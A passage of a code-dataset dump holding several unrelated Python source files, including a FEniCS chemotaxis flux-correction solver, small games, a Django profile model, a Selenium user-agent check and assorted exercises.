CSR_Matrix()\n new_CSR_matrix.update_internal_data(new_PETSc_matrix)\n return new_CSR_matrix\n\n def get_values_CSR(self):\n \"Get data arrays defining content of current matrix, using CSR format\"\n return self.I, self.C, self.V\n\n def set_values(self, values):\n \"Set content of this matrix, assuming same nozero rows and columns\"\n self.V = values\n self.underlying_PETSc_matrix.setValuesCSR(self.I, self.C, self.V)\n self.underlying_PETSc_matrix.assemble()\n\n def build_tranpose_into_matrix(self, CSR_mat):\n \"\"\"Build into a CSR_Matrix the transpose of this.\n warning: previous contents of CSR_mat are not deleted, memory leak?\"\"\"\n # Build a new PETSc matrix\n transpose_mat = self.underlying_PETSc_matrix.duplicate()\n # Copy transpose of underlying_matrix into transpose_mat\n self.underlying_PETSc_matrix.transpose(transpose_mat)\n # Assign transpose_mat as underlying PETSc matrix of CSR_mat\n CSR_mat.update_internal_data(transpose_mat)\n\n def assert_sparsity_pattern(self, other_CSR_mat):\n \"\"\"Assert the position of nz elements math position in other matrix\"\"\"\n assert_equal(self.I, other_CSR_mat.I)\n assert_equal(self.C, other_CSR_mat.C)\n\n def to_FEniCS_matrix(self):\n \"\"\"Build a FEniCS matrix from current values internal CSR values or\n from new values stored in 'values_array'\n \"\"\"\n return PETScMatrix(self.underlying_PETSc_matrix)\n\n#--- Main Flux Correction class ------------------------------------------------\n\nclass KS_FluxCorrect_DefaultScheme(KS_Matrix_DefaultScheme):\n\n \"\"\"\n Deafult Keller-Segel space/time scheme. Underlying FE matrices are\n explicitly build and corrected\n \"\"\"\n\n def __init__( self, mesh, fe_order, dt, t_init=0.,\n k0=1, k1=1, k2=1, k3=1, k4=1 ):\n super().__init__(mesh, fe_order, dt, t_init, k0, k1, k2, k3, k4)\n\n def build_fe_scheme(self):\n \"\"\"\n Define variational equations and FE systems which define current scheme\n \"\"\"\n u, ub = TrialFunction(self.Vh), TestFunction(self.Vh)\n v, vb = TrialFunction(self.Vh), TestFunction(self.Vh)\n #\n # Define variational formulation for u and v\n #\n dt, k2, k3 = self.dt, self.k2, self.k3\n\n # Mass matrix\n mass_form = u*ub*dx\n self.M = assemble( mass_form )\n\n # Mass lumping matrix\n mass_action_form = action(mass_form, Constant(1))\n self.ML = assemble(mass_form) # !!!!\n #print(\"type ML:\", type(self.ML))\n self.ML.zero()\n self.ML.set_diagonal(assemble(mass_action_form))\n #print(\"type Mass action form:\", type(mass_action_form))\n # Diffusion matrix\n self.L = assemble( dot(grad(u), grad(ub))*dx )\n\n # Matrix for the v-equation:\n self.Av = (1 + k3*dt)*self.ML + k2*dt*self.L\n\n # Save matrices\n if self.check_parameter(\"save_matrices\"):\n save_coo_matrix(self.M, \"M.matrix.coo\")\n save_coo_matrix(self.ML, \"ML.matrix.coo\")\n save_coo_matrix(self.L, \"L.matrix.coo\")\n\n\n def solve(self):\n \"\"\"Compute u and v\"\"\"\n\n dt, k0, k1, k4 = self.dt, self.k0, self.k1, self.k4\n\n ##,-------------------------------------------------------------\n ##| 1. compute v and gradient of v\n ##`-------------------------------------------------------------\n b = self.ML * (self.v0.vector() + k4*dt*self.u0.vector())\n solve ( self.Av, self.v.vector(), b ) # Solve A*v = b\n grad_v = project( grad(self.v), self.Wh )\n\n ##,-------------------------------------------------------------\n ##| 2. Define matrices and compute low order solution, u\n ##`-------------------------------------------------------------\n\n #\n # 2.1 Assemble chemotaxis transport matrix\n #\n u, ub = TrialFunction(self.Vh), TestFunction(self.Vh)\n v, vb = TrialFunction(self.Vh), TestFunction(self.Vh)\n C = assemble( u*dot(grad_v, grad(ub)) * dx )\n\n # Add diffusion matrix (at RHS) => complete advect+diffusion operator\n self.K = k1*C - k0*self.L;\n\n #\n # 2.2 Define D. It is an artifficial diffusion matrix D=d_{ij} such that\n # k_{ij} + d_{ij} >= 0 for all i,j\n #\n\n # Build object to access the FEniCS matrix as K a CSR matrix\n K_CSR = CSR_Matrix(self.K)\n # Get arrays defining the storage of K in CSR sparse matrix format,\n I, C, K_vals = K_CSR.get_values_CSR()\n\n # Build a new CSR matrix for the target matrix D\n D_CSR = K_CSR.duplicate()\n # Temporarily, we use the matrix D_CSR for building the transpose of K\n K_CSR.build_tranpose_into_matrix(D_CSR)\n # Get values for the transpose of K\n _, _, T_vals = D_CSR.get_values_CSR()\n\n # Build array with values max(0, -K_ij, -K_ji) for each row i\n D_vals = compute_D_values(I, C, K_vals, T_vals)\n\n # Create the new matrix D, storing the computed array D_vals\n D_CSR.set_values(D_vals)\n self.D = D_CSR.to_FEniCS_matrix()\n\n #\n # 2.3 Eliminate all negative off-diagonal coefficients of K by\n # adding artifficial diffusion\n #\n self.KL = self.D + self.K\n\n #\n # 2.4 Compute low order solution\n #\n U = self.u.vector()\n A = self.ML - dt*self.KL\n b = self.ML * self.u0.vector()\n solve (A, U, b) # Solve A*u = b\n\n if self.check_parameter(\"save_matrices\"):\n save_coo_matrix(self.K, \"K.matrix.coo\")\n save_coo_matrix(self.D, \"D.matrix.coo\")\n save_coo_matrix(self.KL, \"KL.matrix.coo\")\n\n\n if self.check_parameter(\"only_low_order_solution\"):\n print(\"Computed the low order solution (only!!)\")\n return()\n\n ##,-------------------------------------------------------------\n ##| 3. Update u system to high order solution\n ##`-------------------------------------------------------------\n\n #\n # 3.1 Compute raw flux: f_ij = (m_ij*d/dt + d_ij)*(u_j-u_i)\n #\n M_CSR = CSR_Matrix(self.M)\n M_CSR.assert_sparsity_pattern(D_CSR) # Same spasity is implicitly assumed below\n F_CSR = M_CSR.duplicate()\n\n # Get arrays defining the storage of M & F in CSR sparse matrix format\n I, C, M_vals = M_CSR.get_values_CSR()\n _, _, F_vals = F_CSR.get_values_CSR()\n\n # Access to PETSc vector data via numpy. This allows optimized code\n u_numpy = self.u.vector().vec().getArray()\n u0_numpy = self.u0.vector().vec().getArray()\n\n # Compute F values\n n = M_CSR.nrows()\n for i in range(n):\n # a) Get pointers to begin and end of nz elements in row i\n i0, i1 = I[i], I[i+1]\n jColumns = C[i0:i1]\n i_diag = i0 + index( jColumns, i ) # Pointer to diagonal elment\n\n diff_u_i = u_numpy[i] - u_numpy[jColumns]\n diff_u0_i = u0_numpy[i] - u0_numpy[jColumns]\n F_vals[i0:i1] = ( M_vals[i0:i1] * (diff_u_i - diff_u0_i) / dt +\n D_vals[i0:i1] * diff_u_i )\n\n F_vals[i_diag] = 0\n # F_vals[i_diag] = np.sum(F_vals[i0:i1])\n\n self.F = F_CSR.to_FEniCS_matrix()\n\n if self.check_parameter(\"save_matrices\"):\n save_coo_matrix(self.F, \"FF_previous.matrix.coo\")\n\n # ····· Update residuals: F_ij=0 if F_ij*(u_j-u_i) > 0\n F_vals = update_F_values(I, C, F_vals, u_numpy)\n F_CSR.set_values(F_vals)\n # IS NECCESARY NEXT LINE?\n # self.F = F_CSR.to_FEniCS_matrix()\n\n if self.check_parameter(\"save_matrices\"):\n save_coo_matrix(self.F, \"FF.matrix.coo\")\n\n #\n # 3.2. Compute the +,- sums of antidifusive fluxes to node i\n #\n n = len(u_numpy)\n Pplus = np.empty(n); Pminus = np.empty(n)\n for i in range(n):\n # a) Get pointers to begin and end of nz elements in row i\n i0, i1 = I[i], I[i+1]\n i_diag = i0 + index( C[i0:i1], i ) # Pointer to diagonal elment\n\n F0, F1 = F_vals[i0:i_diag], F_vals[i_diag+1:i1]\n Pplus[i] = np.sum( np.maximum(F0,0) ) + np.sum( np.maximum(F1,0) )\n Pminus[i] = np.sum( np.minimum(F0,0) ) + np.sum( np.minimum(F1,0) )\n\n Qplus = np.empty(n); Qminus = np.empty(n)\n for i in range(n):\n # a) Get pointers to begin and end of nz elements in row i\n i0, i1 = I[i], I[i+1]\n i_diag = i0 + index( C[i0:i1], i ) # Pointer to diagonal elment\n j_cols = C[i0:i1] # Nz columns in row i\n j_cols_but_i = j_cols[ j_cols!=i ]\n # print(\"i =\", i, \":\", j_cols_non_i)\n\n # b) Compute u[j] - u[i] for all columns j in row i\n U_ji = u_numpy[j_cols_but_i] - u_numpy[i]\n\n Qplus[i] = np.maximum( np.max(U_ji), 0 )\n Qminus[i] = np.minimum( np.min(U_ji), 0 )\n\n Rplus = np.empty(n); Rminus = np.empty(n)\n # Object to access the FEniCS matrix ML a CSR matrix\n ML_CSR = CSR_Matrix(self.ML)\n # Get arrays defining the storage of ML in CSR sparse matrix format,\n _, _, ML_vals = ML_CSR.get_values_CSR()\n j = 0\n N = len(ML_vals)\n ML_diagonal = np.zeros(n)\n fp_tol = 1.e-20\n for i in range(N):\n if abs(ML_vals[i])>0:\n ML_diagonal[j]=ML_vals[i]\n j=j+1\n print(\"ML_diagonal:\", ML_diagonal)\n for i in range(n):\n if abs(Pplus[i]) < fp_tol:\n Rplus[i] = 0\n else:\n Rplus[i] = np.minimum(1, Qplus[i]*ML_diagonal[i]/(dt*Pplus[i]))\n if abs(Pminus[i]) < fp_tol:\n Rminus[i] = 0\n else:\n Rminus[i] = np.minimum(1, Qminus[i]*ML_diagonal[i]/(dt*Pminus[i]))\n\n print(\"#Pplus:\", Pplus);\n print(\"#Pminus:\", Pminus);\n print(\"#Qplus:\", Qplus);\n print(\"#Qminus:\", Qminus);\n print(\"#ML_vals:\", ML_vals);\n print(\"#Rplus:\", Rplus);\n print(\"#Rminus:\", Rminus);\n\n alpha_CSR = F_CSR.duplicate()\n # Get arrays defining the storage of ML in CSR sparse matrix format,\n I, C, alpha_vals = alpha_CSR.get_values_CSR()\n for i in range(n):\n i0, i1 = I[i], I[i+1]\n jColumns = C[i0:i1]\n alpha_vals[i0:i1] = np.where(\n F_vals[i0:i1]>0,\n np.minimum(Rplus[i], Rminus[jColumns]),\n np.minimum(Rminus[i], Rplus[jColumns])\n )\n alpha_CSR.set_values(alpha_vals)\n self.alpha = alpha_CSR.to_FEniCS_matrix()\n if self.check_parameter(\"save_matrices\"):\n print(\"Saving alpha\")\n save_coo_matrix(self.alpha, \"alpha.matrix.coo\")\n\n #########################\n\n barFunction = Function(self.Vh);\n barf = barFunction.vector()\n for i in range(n):\n i0, i1 = I[i], I[i+1]\n i_diag = i0 + index( C[i0:i1], i ) # Pointer to diagonal elment\n # Under- and super-diagonal values\n F0, F1 = F_vals[i0:i_diag], F_vals[i_diag+1:i1]\n alpha0, alpha1 = alpha_vals[i0:i_diag], alpha_vals[i_diag+1:i1]\n barf[i] = np.sum( F0*alpha0 ) + np.sum( F1*alpha1 )\n\n A = self.ML - dt*self.KL\n b = self.ML * self.u0.vector() - dt*barf\n print(\"Solving high order scheme\")\n print(\"barf=\", barf.vec().getArray())\n solve (A, self.u.vector(), b) # Solve A*u = b\n","repo_name":"AlbaNaIz/ks_flux_correction","sub_path":"fenics/keller_segel/flux_correct.py","file_name":"flux_correct.py","file_ext":"py","file_size_in_byte":13388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13585095950","text":"#tic tac toe\nfrom random import randint, choice\n\ndef get_move():\n move = ''\n move_input = False\n while not move_input:\n move = input('Please input move location as coords from 1,1 to 3,3: ')\n move = move.split(',')\n if len(move) == 2:\n if move[0].isnumeric() and move[1].isnumeric():\n if 0 < int(move[0]) < 4 and 0 < int(move[1]) < 4:\n move_input = True\n print(move)\n else:\n print('Please just enter two integers separated with single comma in format: \"3,2\"')\n move = [int(x)-1 for x in move]\n return move\n\ndef print_board(moves):\n print(f'{moves[0][0]} ¦ {moves[0][1]} ¦ {moves[0][2]}\\n'\n f'{moves[1][0]} ¦ {moves[1][1]} ¦ {moves[1][2]}\\n'\n f'{moves[2][0]} ¦ {moves[2][1]} ¦ {moves[2][2]}\\n')\n\ndef select_first_player():\n if randint(0,1):\n print('Computer starts')\n return 1\n else:\n print('User starts')\n return 0\n\ndef find_empty_spot(moves):\n empty_spaces = []\n for idx_r, row in enumerate(moves):\n for idx_c, column in enumerate(row):\n if ' ' in column:\n empty_spaces.append([idx_r, idx_c])\n print(f'empty space: {empty_spaces}')\n return empty_spaces\n\ndef check_win(moves, letter):\n for row in moves: #check rows\n matching = [s for s in row if letter in s]\n # print(len(matching))\n if len(matching) == 3:\n print('row matching:')\n return True\n for idx in range(3):\n # print(idx)\n column_lists = [item[idx] for item in moves]\n matching = [s for s in column_lists if letter in s]\n # print(len(matching))\n if len(matching) == 3:\n print(len(matching))\n return True\n diag1 = [moves[0][0],moves[1][1],moves[2][2]]\n matching = [s for s in diag1 if letter in s]\n if len(matching) == 3:\n print('diag 1 true')\n return True\n diag2 = [moves[0][2], moves[1][1], moves[2][0]]\n matching = [s for s in diag2 if letter in s]\n if len(matching) == 3:\n print('diag 2 true')\n return True\n return False\n\nrunning_game = 1\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n while running_game:\n moves = [[' ', ' ', ' '], [' ', ' ', ' '], [' ', ' ', ' ']]\n player = select_first_player() #1 = computer, 0 = user\n playing = 1 #set playing loop\n print_board(moves)\n while playing:\n if player: #computer (C)\n empty_space_lst = find_empty_spot(moves)\n place = choice(empty_space_lst)\n moves[place[0]][place[1]] = 'C'\n print_board(moves)\n player = 0\n if check_win(moves, 'C'):\n print('comp is winner')\n playing = 0\n else: #user\n loop_move = 1\n move = get_move()\n while loop_move:\n if moves[move[0]][move[1]] == ' ':\n moves[move[0]][move[1]] = 'U'\n loop_move = False\n else:\n 'Cant place there, please try again'\n move = get_move()\n print_board(moves)\n player = 1\n if check_win(moves, 'U'):\n print('user is winner')\n playing = 0\n keep_playing = input('keep playing (y/n)?')\n if keep_playing.lower() == 'n':\n running_game = 0\n # get_move()\n # print_board(moves)\n # running_game = 0\n\n\n","repo_name":"Rory-Williams/TicTacToe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5196626787","text":"'''\r\nGame of Life\r\n- Contrast NumPy arrays to standard Python lists.\r\n- Create data visualizations.\r\n- Manage a Pandas dataframe.\r\n\r\n\r\nJesse Renteria III\r\nWeek 9 - 05/23/2022\r\n\r\nI have not given or received any unauthorized assistance on this assignment.\r\n\r\nYouTube Link:\r\nhttps://youtu.be/8pbAe4zz5Co\r\n\r\n'''\r\n\r\n#from curses.panel import bottom_panel, top_panel\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt \r\nfrom matplotlib import colors \r\nfrom matplotlib.pyplot import figure, draw, pause\r\nimport math\r\n\r\ndef main():\r\n 'displays the Conway Board(s)'\r\n greeting()\r\n s = sizeQ()\r\n p = probabilityQ()\r\n t = iterationQ()\r\n response = boardQ() # show all iterations or only last\r\n board = conway(s, p)\r\n allboard = advance(board,t) # keeps all boards\r\n display(allboard,s,t,response) # function will determine whether or not to show all or just final board\r\n\r\ndef greeting():\r\n 'print greeting'\r\n print('Howdy User! \\n\\nWe will be playing the Game of Life.')\r\n \r\ndef sizeQ(): # Ask what the user wants the size to be?\r\n 'return response'\r\n response = int(input('\\nWhat size would you like the array to be?: '))\r\n return response\r\n\r\ndef probabilityQ(): # Ask what the user wants the probability to be?\r\n 'return response'\r\n print('\\nPlease enter a decimal number between 0 and 1: ') \r\n response = float(input('What would you like the probability to be ?: '))\r\n return response\r\n\r\ndef iterationQ(): # Ask how many iterations wants to do?\r\n 'return response'\r\n response = int(input('\\nHow many iterations would you like the board to undergo?: '))\r\n return response\r\n\r\ndef boardQ(): # Ask user if they want to see all the board versions\r\n \"return response == 'YES'\" # True or False\r\n print('\\nPlease answer will yes or no to the following question: ')\r\n response = input('Would you like to see all of the different board version?: ')\r\n return response.upper() == 'YES'\r\n\r\ndef conway(s, p): # s = size of the array & p = probability of alive cells on board\r\n 'return board'\r\n alive = round(p*s) # need to round just in case if it is a decimal\r\n dead = s-alive\r\n dimensions = int(math.sqrt(s)) # if s=100 then it will be 10 by 10 # convert to int from float\r\n board = np.array([1]*alive + [0]*dead)\r\n np.random.shuffle(board)\r\n board.shape = (dimensions,dimensions) \r\n return board\r\n\r\ndef advance(b,t): # curious if there is a faster way or not \r\n 'return b -- new version based on t times'\r\n dim = b.shape\r\n size = dim[0]\r\n maxD = dim[0]-1\r\n allBoards = [] # put all arrays (versions of the boards) in here\r\n for round in range(1,t+1): \r\n newB = []\r\n for y in range(size):\r\n upper = upperORleftN(y,maxD)\r\n lower = lowerORrightN(y,maxD)\r\n for x in range(size):\r\n left = upperORleftN(x,maxD)\r\n right = lowerORrightN(x,maxD)\r\n allNs = neighbors(b,x,y,upper,lower,right,left) # max would be 8\r\n loc = b[y,x]\r\n if loc == 1:\r\n if allNs < 2:\r\n newB.append(0) # becomes 0 (die by underpopulation)\r\n elif allNs == 2 or allNs == 3:\r\n newB.append(1) # stays 1 (lives on to next gen)\r\n elif allNs > 3:\r\n newB.append(0) # becoms 0 (die by overpopulation)\r\n elif loc == 0:\r\n if allNs == 3:\r\n newB.append(1) # becomes 1 (lives by reproduction)\r\n else:\r\n newB.append(loc)\r\n allBoards.append(newB)\r\n b = np.array(newB) # allows for the new version of the board to be created\r\n b.shape = dim # sets up the board properly\r\n return allBoards \r\n\r\ndef neighbors(b,x,y,upper,lower,right,left):\r\n 'return allNs'\r\n n1 = b[upper,left] \r\n n2 = b[upper,x] \r\n n3 = b[upper,right] \r\n n4 = b[y,left] \r\n n5 = b[y,right] \r\n n6 = b[lower,left] \r\n n7 = b[lower,x] \r\n n8 = b[lower,right] \r\n allNs = n1 + n2 + n3 + n4 + n5 + n6 + n7 + n8\r\n return allNs\r\n\r\ndef upperORleftN(xy,maxD): # to figure out the uppper/left value\r\n 'return upperORleft'\r\n if xy == 0: \r\n upperORleft = maxD\r\n else:\r\n upperORleft = xy-1\r\n return upperORleft\r\n\r\ndef lowerORrightN(xy,maxD): # to figure out the lower/right value\r\n 'return lowerORright'\r\n if xy == maxD: \r\n lowerORright = 0\r\n else:\r\n lowerORright = xy+1 \r\n return lowerORright \r\n\r\ndef display(allBoards,size,round,response):\r\n 'plt.show()'\r\n dim = int(size**(1/2))\r\n if int(response) == 1: # shows all boards\r\n while True:\r\n length = len(allBoards)\r\n fg = figure()\r\n ax = fg.gca()\r\n\r\n newboard = np.array(allBoards[0])\r\n newboard.shape = (dim,dim)\r\n colormap = colors.ListedColormap(['white', 'black']) # white is 0 black is 1\r\n h = ax.imshow(newboard, cmap=colormap)\r\n \r\n for n in range(1,length+1):\r\n nboard = np.array(allBoards[n-1])\r\n nboard.shape = (dim,dim)\r\n h.set_data(nboard)\r\n plt.title(f'{dim}x{dim} Conway Board at T={n}')\r\n draw(), pause(1)\r\n if not exitCode():\r\n break\r\n\r\n else: # shows only final board\r\n newBoard = np.array(allBoards[-1])\r\n newBoard.shape = (dim,dim)\r\n colormap = colors.ListedColormap(['white', 'black']) # white is 0 black is 1\r\n plt.imshow(newBoard,cmap=colormap)\r\n plt.title(f'{dim}x{dim} Conway Board at T={round}') \r\n plt.show()\r\n\r\n\r\ndef exitCode(): #determines whether or not to exit the code\r\n 'returns True or False'\r\n response = input('\\nWould you like to see the different board versions again? (Yes or No): ')\r\n return response.strip().upper() == 'YES'\r\n\r\nmain()\r\n\r\n","repo_name":"renteria3/Python_Code","sub_path":"Game of Life.py","file_name":"Game of Life.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26090023630","text":"import torch\nimport torch.nn as nn\nimport torch.nn.init as init\n\nfrom ast import literal_eval\nfrom src.model.generator.MRF import MRF\nfrom torch.nn.utils import weight_norm\n\n\nclass Generator(nn.Module):\n def __init__(self, d_input, d_inner, k_u, k_r, D_r):\n super().__init__()\n k_u, k_r, D_r = literal_eval(k_u), literal_eval(k_r), literal_eval(D_r)\n self.input_layer = weight_norm(nn.Conv1d(d_input, d_inner,\n kernel_size=7, stride=1, padding=3))\n self.relu = nn.LeakyReLU(0.1)\n self.tanh = nn.Tanh()\n self.upsampling_blocks = nn.ModuleList()\n self.mrfs = nn.ModuleList()\n\n curr_channels = d_inner\n for i in range(len(k_u)):\n self.upsampling_blocks.append(\n weight_norm(nn.ConvTranspose1d(in_channels=curr_channels,\n out_channels=curr_channels // 2,\n kernel_size=k_u[i], stride=k_u[i] // 2,\n padding=(k_u[i] - k_u[i] // 2) // 2))\n )\n curr_channels //= 2\n self.mrfs.append(MRF(curr_channels, k_r, D_r))\n\n self.output_layer = weight_norm(nn.Conv1d(curr_channels, 1, kernel_size=7, padding=3))\n self.apply(self.__init_weights)\n\n @staticmethod\n def __init_weights(layer):\n if isinstance(layer, (nn.Conv1d, nn.ConvTranspose1d)):\n init.normal_(layer.weight, 0, 0.01)\n init.constant_(layer.bias, 0)\n\n def forward(self, x):\n x = self.input_layer(x)\n for i in range(len(self.upsampling_blocks)):\n x = self.relu(x)\n x = self.upsampling_blocks[i](x)\n x = self.mrfs[i](x)\n x = self.output_layer(self.relu(x))\n return self.tanh(x)\n","repo_name":"johanDDC/vocoder","sub_path":"src/model/generator/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24782097146","text":"from django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.utils import timezone\nfrom django.utils.html import format_html\nfrom PIL import Image\nfrom django.contrib.auth import get_user_model\nfrom custom_auth.validator import image_validator\nUser = get_user_model()\n\n# Create your models here.\nclass UserProfile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n phone_number = models.CharField(max_length=15, blank=True, null=True)\n date_of_birth = models.DateField(blank=True, null=True)\n street = models.CharField(max_length=100, blank=True, null=True)\n city = models.CharField(max_length=50, blank=True, null=True)\n state = models.CharField(max_length=50, blank=True, null=True)\n postal_code = models.CharField(max_length=10, blank=True, null=True)\n country = models.CharField(max_length=50, blank=True, null=True)\n billing_address = models.TextField(max_length=100, blank=True, null=True)\n profile_picture = models.ImageField(upload_to='profile_pictures/', validators=[image_validator], blank=True, null=True, help_text='Must be .jpeg .jpg .png Format and Size should not exceed 2 MiB.')\n\n\n created_at = models.DateTimeField(auto_now_add=True, editable=False)\n updated_at = models.DateTimeField(auto_now=True, editable=False)\n created_by = models.ForeignKey(User, on_delete=models.PROTECT, related_name='created_%(class)ss')\n updated_by = models.ForeignKey(User, on_delete=models.PROTECT, related_name='updated_%(class)ss', null=True, blank=True)\n \n def __str__(self):\n return self.user.username\n\n def image_tag(self):\n return format_html('', self.profile_picture)\n\n image_tag.short_description = 'Image'\n image_tag.allow_tags = True\n\n def save(self, *args, **kwargs):\n super(UserProfile, self).save(*args, **kwargs)\n try:\n if self.profile_picture:\n img = Image.open(self.profile_picture.path)\n if img.height > 300 or img.width > 300:\n image_size = (300, 300)\n img.thumbnail(image_size)\n img.save(self.profile_picture.path)\n except Exception as e:\n pass\n # print(str(e))","repo_name":"monir07/devxhub-ecommerce","sub_path":"user_profile/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5622814310","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass LinkedList:\n def __init__(self, value):\n new_node = Node(value)\n self.head = new_node\n self.tail = new_node\n self.length = 1\n\n def append(self, value):\n new_node = Node(value)\n if self.length == 0:\n self.head = new_node\n self.tail = new_node\n else:\n self.tail.next = new_node\n self.tail = new_node\n self.length += 1\n\n def remove_duplicates(self):\n values = set()\n previous = None\n current = self.head\n while current:\n if current.value in values:\n previous.next = current.next\n self.length -= 1\n else:\n values.add(current.value)\n previous = current\n current = current.next\n\n def print_all(self):\n values=[]\n temp=self.head\n while temp is not None:\n values.append(str(temp.value))\n temp=temp.next\n print(' -> '.join(values))\n\nmy_linked_list = LinkedList(1)\nmy_linked_list.append(1)\nmy_linked_list.append(2)\nmy_linked_list.append(3)\nmy_linked_list.append(3)\nmy_linked_list.append(2)\nmy_linked_list.append(4)\nmy_linked_list.remove_duplicates()\n\nmy_linked_list.print_all()","repo_name":"bnasare/DSA","sub_path":"LINKED LIST/LeetCode Questions/remove_duplicates.py","file_name":"remove_duplicates.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33563715065","text":"t# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 5 15:38:04 2019\n\n@author: leilei\n\"\"\"\n\nimport os\n#遍历文件夹 \ndef recurrence(path,file_list):\n for file in os.listdir(path):\n fs = os.path.join(path, file)\n if os.path.isfile(fs):\n file_list.append(fs)\n elif os.path.isdir(fs):\n recurrence(fs, file_list) \ndef main(): \n path_1 = 'D:\\\\Human_matting\\\\SImple_segmentation'\n path_2 = 'D:\\\\EG2000\\\\test_masks'\n filenames_1 = [] # 带路径的文件名存入列表\n filenames_2 = []\n recurrence(path_1, filenames_1)\n recurrence(path_2, filenames_2) \n f1 = open(\"D:\\Human_matting\\\\evalue_accurate.txt\", \"w\")\n for filename_1, filename_2 in zip(filenames_1, filenames_2): \n newname_1=str(filename_1).replace('\\\\','/')\n newname_2=str(filename_2).replace('\\\\','/')\n f1.write(newname_1+' '+newname_2+'\\n')\n f1.close() # 要记得关闭!\n# f2 = open(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\Datas\\\\matting.txt\", \"w\")\n# for filename in filenames_2:\n# f2.write(filename+'\\n')\n# f2.close() # 要记得关闭!\n# print(len(filenames_1))\n# print(len(filenames_2))\nif __name__ == \"__main__\":\n main()\n print('finish!!!!')","repo_name":"lijiashu/Human_matting","sub_path":"generate_pic_path.py","file_name":"generate_pic_path.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21963703509","text":"\"\"\"\n$Id$\n\"\"\"\n\n### JCALERT: Does this file is of any interrest now?\n\n__version__='$Revision$'\n\nimport unittest\n\nclass TestDummy(unittest.TestCase):\n def test_add(self):\n self.assertEqual(1+1,2)\n\n\n\nsuite = unittest.TestSuite()\n# Uncomment the following line of code, to disable the test if\n# $DISPLAY is undefined. Used mainly for GUI testing.\n# suite.requires_display = True\nsuite.addTest(unittest.makeSuite(TestDummy))\n","repo_name":"jesuscript/topo-mpi","sub_path":"topo/tests/testdummy.py","file_name":"testdummy.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"35368723950","text":"import sys\nimport io\n\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\n\n\n\"\"\"\n\n\"\"\"\n\nfrom selenium import webdriver\n\noptions = webdriver.ChromeOptions()\noptions.headless = True\noptions.add_argument(\"window-siez=1920x1080\")\n# headless 사용시 user-agent 입력이 필요할 수 있음.\noptions.add_argument(\"user-agent =Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\")\n\nbrowser = webdriver.Chrome(options=options)\nbrowser.maximize_window()\n\nurl = \"https://www.whatismybrowser.com/detect/what-is-my-user-agent\"\nbrowser.get(url)\n\n#\ndetected_value = browser.find_element_by_id(\"detected_value\")\nprint(detected_value.text)\nbrowser.quit()\n","repo_name":"Suyoung-Yang/workspace2","sub_path":"webscraping_basic/18_headless_chrome_useragent.py","file_name":"18_headless_chrome_useragent.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11751807146","text":"'''\nCreated on Dec 27, 2012\n\n@author: pew\n'''\nimport unittest\n\nfrom puzzle.nearestpoints import PointEvaluator,Point\n\n\ntext = \"g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw ml rfc spj.\"\n\nclass PointTest(unittest.TestCase):\n def testDistance(self):\n point = Point(3,4)\n self.assertEqual(5, point.distanceFromZero())\n\n\nclass DistTest(unittest.TestCase):\n \n def testBasicListBehaviour(self):\n numbers = range(0,100)\n indexOfLastElement = -1\n self.assertEqual(99, numbers[indexOfLastElement])\n self.assertEqual(0, numbers[0])\n self.assertEqual(100,len(numbers))\n\n\n def testAddIfBetterWhenListIsNotFull(self):\n n = PointEvaluator()\n numbers = range(0,PointEvaluator.BEST_POINTS_LIST_LENGTH-1)\n numbers = n.addIfBetter(numbers, 200)\n self.assertEqual(200,numbers[-1])\n\n def testAddIfBetter(self):\n n = PointEvaluator()\n numbers = range(0,99)\n numbers.append(200)\n n.addIfBetter(numbers, 100)\n self.assertEqual(100,numbers[-1])\n\n def testDist(self):\n n = PointEvaluator()\n x = n.dist(3,4)\n self.assertEqual(25,x)\n pass\n\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testDist']\n unittest.main()","repo_name":"1pindsvin/yagni","sub_path":"puzzle/unittests/puzzle/nearestpoints_fixture.py","file_name":"nearestpoints_fixture.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"41643073574","text":"from typing import List\n\n\nclass Solution:\n def longestWPI(self, hours: List[int]) -> int:\n\n prefix = 0\n d = {}\n res = 0\n for i, h in enumerate(hours):\n prefix += 1 if h > 8 else -1\n\n if prefix > 0:\n res = i + 1\n elif prefix - 1 in d:\n res = 